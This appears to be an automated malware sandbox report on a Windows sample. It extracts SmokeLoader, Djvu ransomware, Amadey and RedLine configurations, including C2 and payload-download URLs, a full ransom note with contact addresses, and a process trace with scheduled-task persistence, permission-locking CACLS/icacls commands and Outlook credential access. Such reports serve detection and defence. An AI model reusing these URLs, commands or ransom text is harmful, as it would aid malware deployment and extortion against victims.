Analysis
-
max time kernel
119s -
max time network
152s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
27-03-2023 07:46
Static task
static1
Behavioral task
behavioral1
Sample
dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe
Resource
win10-20230220-en
General
-
Target
dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe
-
Size
259KB
-
MD5
37d059689141316003e150dc31a34c23
-
SHA1
c5ec49918d6b6730c81d2a4285bb2445553dcd02
-
SHA256
dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630
-
SHA512
4c0b8f91fd8486c7737698ac00add93398c4fffb59b0bc59a9793e119d0737f08517368550f8f9604ac198d8538c5efa1bd7291d8cd59addb9f1b112640698c6
-
SSDEEP
3072:5TlmjeeWXQDwL/5qiFexXUKaKO9y4oeeW2BfsfBXYjzBJzVrsNME4Cs5xbKuEXq:5YXDwLgimX5GdeDBfsJXYjzbiNP45zE
Malware Config
Extracted
smokeloader
2022
http://potunulit.org/
http://hutnilior.net/
http://bulimu55t.net/
http://soryytlic4.net/
http://novanosa5org.org/
http://nuljjjnuli.org/
http://tolilolihul.net/
http://somatoka51hub.net/
http://hujukui3.net/
http://bukubuka1.net/
http://golilopaster.org/
http://newzelannd66.org/
http://otriluyttn.org/
http://aapu.at/tmp/
http://poudineh.com/tmp/
http://firsttrusteedrx.ru/tmp/
http://kingpirate.ru/tmp/
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
djvu
http://zexeq.com/lancer/get.php
-
extension
.typo
-
offline_id
Yao2o6f5vNghOpgVBhEIA8O96SC5vLcgITgaRMt1
-
payload_url
http://uaery.top/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-f8UEvx4T0A Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0672IsjO
Extracted
smokeloader
pub1
Extracted
smokeloader
sprg
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
redline
koreamon
koreamonitoring.com:80
-
auth_value
1a0e1a9f491ef3df873a03577dfa10aa
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detected Djvu ransomware 16 IoCs
Processes:
resource yara_rule behavioral1/memory/4280-135-0x00000000048D0000-0x00000000049EB000-memory.dmp family_djvu behavioral1/memory/4296-136-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4296-138-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4296-139-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4296-140-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4296-161-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1148-168-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1148-169-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1148-174-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1148-175-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1148-176-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1148-181-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1148-183-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1148-184-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1148-189-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1148-205-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 13 IoCs
Processes:
resource yara_rule behavioral1/memory/4256-295-0x00000000026B0000-0x000000000270A000-memory.dmp family_redline behavioral1/memory/4256-301-0x0000000002870000-0x00000000028C6000-memory.dmp family_redline behavioral1/memory/4256-302-0x0000000002870000-0x00000000028C2000-memory.dmp family_redline behavioral1/memory/4256-303-0x0000000002870000-0x00000000028C2000-memory.dmp family_redline behavioral1/memory/4256-305-0x0000000002870000-0x00000000028C2000-memory.dmp family_redline behavioral1/memory/4256-307-0x0000000002870000-0x00000000028C2000-memory.dmp family_redline behavioral1/memory/4256-309-0x0000000002870000-0x00000000028C2000-memory.dmp family_redline behavioral1/memory/4256-311-0x0000000002870000-0x00000000028C2000-memory.dmp family_redline behavioral1/memory/4256-313-0x0000000002870000-0x00000000028C2000-memory.dmp family_redline behavioral1/memory/4256-315-0x0000000002870000-0x00000000028C2000-memory.dmp family_redline behavioral1/memory/4256-317-0x0000000002870000-0x00000000028C2000-memory.dmp family_redline behavioral1/memory/4256-319-0x0000000002870000-0x00000000028C2000-memory.dmp family_redline behavioral1/memory/4256-322-0x0000000002870000-0x00000000028C2000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
XandETC.exedescription pid process target process PID 5088 created 2068 5088 XandETC.exe Explorer.EXE PID 5088 created 2068 5088 XandETC.exe Explorer.EXE PID 5088 created 2068 5088 XandETC.exe Explorer.EXE PID 5088 created 2068 5088 XandETC.exe Explorer.EXE PID 5088 created 2068 5088 XandETC.exe Explorer.EXE -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
Explorer.EXEpid process 2068 Explorer.EXE -
Executes dropped EXE 25 IoCs
Processes:
DA96.exeDA96.exeE584.exeE71B.exeDA96.exeDA96.exeFFC4.exe14C.exebuild3.exe97B.exePlayer3.exess31.exeXandETC.exenbveek.exe1802.exe1F18.exePlayer3.exe21D8.exe6AC9.exenbveek.exemstsca.exe9B31.bat.exeCCE0.exeupdater.exeJGAbA.bat.exepid process 4280 DA96.exe 4296 DA96.exe 4508 E584.exe 956 E71B.exe 4720 DA96.exe 1148 DA96.exe 360 FFC4.exe 4820 14C.exe 4344 build3.exe 708 97B.exe 4632 Player3.exe 4900 ss31.exe 5088 XandETC.exe 864 nbveek.exe 164 1802.exe 2176 1F18.exe 396 Player3.exe 1352 21D8.exe 4256 6AC9.exe 704 nbveek.exe 4700 mstsca.exe 4896 9B31.bat.exe 4376 CCE0.exe 1584 updater.exe 3136 JGAbA.bat.exe -
Loads dropped DLL 3 IoCs
Processes:
rundll32.exerundll32.exerundll32.exepid process 752 rundll32.exe 3728 rundll32.exe 4440 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
DA96.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\d816343c-10e1-4037-9d01-b50f4c7070f1\\DA96.exe\" --AutoStart" DA96.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 api.2ip.ua 22 api.2ip.ua 9 api.2ip.ua -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
CCE0.exepid process 4376 CCE0.exe 4376 CCE0.exe 4376 CCE0.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
DA96.exeDA96.exedescription pid process target process PID 4280 set thread context of 4296 4280 DA96.exe DA96.exe PID 4720 set thread context of 1148 4720 DA96.exe DA96.exe -
Drops file in Program Files directory 1 IoCs
Processes:
XandETC.exedescription ioc process File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1564 sc.exe 3356 sc.exe 428 sc.exe 5036 sc.exe 996 sc.exe 3916 sc.exe 3216 sc.exe 3076 sc.exe 3364 sc.exe 620 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4616 956 WerFault.exe E71B.exe 1840 4820 WerFault.exe 14C.exe 1204 164 WerFault.exe 1802.exe 2896 1352 WerFault.exe 21D8.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
FFC4.exe1F18.exedfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exeE584.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FFC4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1F18.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1F18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E584.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FFC4.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1F18.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E584.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI E584.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FFC4.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 3364 schtasks.exe 1844 schtasks.exe 1896 schtasks.exe -
Modifies registry class 1 IoCs
Processes:
9B31.bat.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings 9B31.bat.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exeExplorer.EXEpid process 3956 dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe 3956 dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2068 Explorer.EXE -
Suspicious behavior: MapViewOfSection 22 IoCs
Processes:
dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exeE584.exeFFC4.exe1F18.exeExplorer.EXEpid process 3956 dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe 4508 E584.exe 360 FFC4.exe 2176 1F18.exe 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE 2068 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXE6AC9.exepowershell.exe9B31.bat.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeShutdownPrivilege 2068 Explorer.EXE Token: SeCreatePagefilePrivilege 2068 Explorer.EXE Token: SeDebugPrivilege 4256 6AC9.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 4896 9B31.bat.exe Token: SeDebugPrivilege 3640 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeIncreaseQuotaPrivilege 3640 powershell.exe Token: SeSecurityPrivilege 3640 powershell.exe Token: SeTakeOwnershipPrivilege 3640 powershell.exe Token: SeLoadDriverPrivilege 3640 powershell.exe Token: SeSystemProfilePrivilege 3640 powershell.exe Token: SeSystemtimePrivilege 3640 powershell.exe Token: SeProfSingleProcessPrivilege 3640 powershell.exe Token: SeIncBasePriorityPrivilege 3640 powershell.exe Token: SeCreatePagefilePrivilege 3640 powershell.exe Token: SeBackupPrivilege 3640 powershell.exe Token: SeRestorePrivilege 3640 powershell.exe Token: SeShutdownPrivilege 3640 powershell.exe Token: SeDebugPrivilege 3640 powershell.exe Token: SeSystemEnvironmentPrivilege 3640 powershell.exe Token: SeRemoteShutdownPrivilege 3640 powershell.exe Token: SeUndockPrivilege 3640 powershell.exe Token: SeManageVolumePrivilege 3640 powershell.exe Token: 33 3640 powershell.exe Token: 34 3640 powershell.exe Token: 35 3640 powershell.exe Token: 36 3640 powershell.exe Token: SeDebugPrivilege 4292 powershell.exe Token: SeShutdownPrivilege 3132 powercfg.exe Token: SeCreatePagefilePrivilege 3132 powercfg.exe Token: SeShutdownPrivilege 3412 powercfg.exe Token: SeCreatePagefilePrivilege 3412 powercfg.exe Token: SeShutdownPrivilege 4836 powercfg.exe Token: SeCreatePagefilePrivilege 4836 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Explorer.EXEDA96.exeDA96.exeDA96.exeDA96.exebuild3.exe97B.exePlayer3.exenbveek.exedescription pid process target process PID 2068 wrote to memory of 4280 2068 Explorer.EXE DA96.exe PID 2068 wrote to memory of 4280 2068 Explorer.EXE DA96.exe PID 2068 wrote to memory of 4280 2068 Explorer.EXE DA96.exe PID 4280 wrote to memory of 4296 4280 DA96.exe DA96.exe PID 4280 wrote to memory of 4296 4280 DA96.exe DA96.exe PID 4280 wrote to memory of 4296 4280 DA96.exe DA96.exe PID 4280 wrote to memory of 4296 4280 DA96.exe DA96.exe PID 4280 wrote to memory of 4296 4280 DA96.exe DA96.exe PID 4280 wrote to memory of 4296 4280 DA96.exe DA96.exe PID 4280 wrote to memory of 4296 4280 DA96.exe DA96.exe PID 4280 wrote to memory of 4296 4280 DA96.exe DA96.exe PID 4280 wrote to memory of 4296 4280 DA96.exe DA96.exe PID 4280 wrote to memory of 4296 4280 DA96.exe DA96.exe PID 4296 wrote to memory of 1012 4296 DA96.exe icacls.exe PID 4296 wrote to memory of 1012 4296 DA96.exe icacls.exe PID 4296 wrote to memory of 1012 4296 DA96.exe icacls.exe PID 2068 wrote to memory of 4508 2068 Explorer.EXE E584.exe PID 2068 wrote to memory of 4508 2068 Explorer.EXE E584.exe PID 2068 wrote to memory of 4508 2068 Explorer.EXE E584.exe PID 4296 wrote to memory of 4720 4296 DA96.exe DA96.exe PID 4296 wrote to memory of 4720 4296 DA96.exe DA96.exe PID 4296 wrote to memory of 4720 4296 DA96.exe DA96.exe PID 2068 wrote to memory of 956 2068 Explorer.EXE E71B.exe PID 2068 wrote to memory of 956 2068 Explorer.EXE E71B.exe PID 2068 wrote to memory of 956 2068 Explorer.EXE E71B.exe PID 4720 wrote to memory of 1148 4720 DA96.exe DA96.exe PID 4720 wrote to memory of 1148 4720 DA96.exe DA96.exe PID 4720 wrote to memory of 1148 4720 DA96.exe DA96.exe PID 4720 wrote to memory of 1148 4720 DA96.exe DA96.exe PID 4720 wrote to memory of 1148 4720 DA96.exe DA96.exe PID 4720 wrote to memory of 1148 4720 DA96.exe DA96.exe PID 4720 wrote to memory of 1148 4720 DA96.exe DA96.exe PID 4720 wrote to memory of 1148 4720 DA96.exe DA96.exe PID 4720 wrote to memory of 1148 4720 DA96.exe DA96.exe PID 4720 wrote to memory of 1148 4720 DA96.exe DA96.exe PID 2068 wrote to memory of 360 2068 Explorer.EXE FFC4.exe PID 2068 wrote to memory of 360 2068 Explorer.EXE FFC4.exe PID 2068 wrote to memory of 360 2068 Explorer.EXE FFC4.exe PID 2068 wrote to memory of 4820 2068 Explorer.EXE 14C.exe PID 2068 wrote to memory of 4820 2068 Explorer.EXE 14C.exe PID 2068 wrote to memory of 4820 2068 Explorer.EXE 14C.exe PID 1148 wrote to memory of 4344 1148 DA96.exe build3.exe PID 1148 wrote to memory of 4344 1148 DA96.exe build3.exe PID 1148 wrote to memory of 4344 1148 DA96.exe build3.exe PID 4344 wrote to memory of 3364 4344 build3.exe schtasks.exe PID 4344 wrote to memory of 3364 4344 build3.exe schtasks.exe PID 4344 wrote to memory of 3364 4344 build3.exe schtasks.exe PID 2068 wrote to memory of 708 2068 Explorer.EXE 97B.exe PID 2068 wrote to memory of 708 2068 Explorer.EXE 97B.exe PID 2068 wrote to memory of 708 2068 Explorer.EXE 97B.exe PID 708 wrote to memory of 4632 708 97B.exe Player3.exe PID 708 wrote to memory of 4632 708 97B.exe Player3.exe PID 708 wrote to memory of 4632 708 97B.exe Player3.exe PID 708 wrote to memory of 4900 708 97B.exe ss31.exe PID 708 wrote to memory of 4900 708 97B.exe ss31.exe PID 708 wrote to memory of 5088 708 97B.exe XandETC.exe PID 708 wrote to memory of 5088 708 97B.exe XandETC.exe PID 4632 wrote to memory of 864 4632 Player3.exe nbveek.exe PID 4632 wrote to memory of 864 4632 Player3.exe nbveek.exe PID 4632 wrote to memory of 864 4632 Player3.exe nbveek.exe PID 864 wrote to memory of 1844 864 nbveek.exe schtasks.exe PID 864 wrote to memory of 1844 864 nbveek.exe schtasks.exe PID 864 wrote to memory of 1844 864 nbveek.exe schtasks.exe PID 864 wrote to memory of 420 864 nbveek.exe cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe -
outlook_win_path 1 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe"C:\Users\Admin\AppData\Local\Temp\dfafc19065140674c7b3e3ffe533f121fe6b2fe1ffb9c0a2dfc15a9d030a0630.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\DA96.exeC:\Users\Admin\AppData\Local\Temp\DA96.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\DA96.exeC:\Users\Admin\AppData\Local\Temp\DA96.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\d816343c-10e1-4037-9d01-b50f4c7070f1" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\DA96.exe"C:\Users\Admin\AppData\Local\Temp\DA96.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\DA96.exe"C:\Users\Admin\AppData\Local\Temp\DA96.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\4e9ade8e-467d-4b51-b2ef-1e54941d7f86\build3.exe"C:\Users\Admin\AppData\Local\4e9ade8e-467d-4b51-b2ef-1e54941d7f86\build3.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\E584.exeC:\Users\Admin\AppData\Local\Temp\E584.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\E71B.exeC:\Users\Admin\AppData\Local\Temp\E71B.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 4763⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\FFC4.exeC:\Users\Admin\AppData\Local\Temp\FFC4.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\14C.exeC:\Users\Admin\AppData\Local\Temp\14C.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 4803⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\97B.exeC:\Users\Admin\AppData\Local\Temp\97B.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
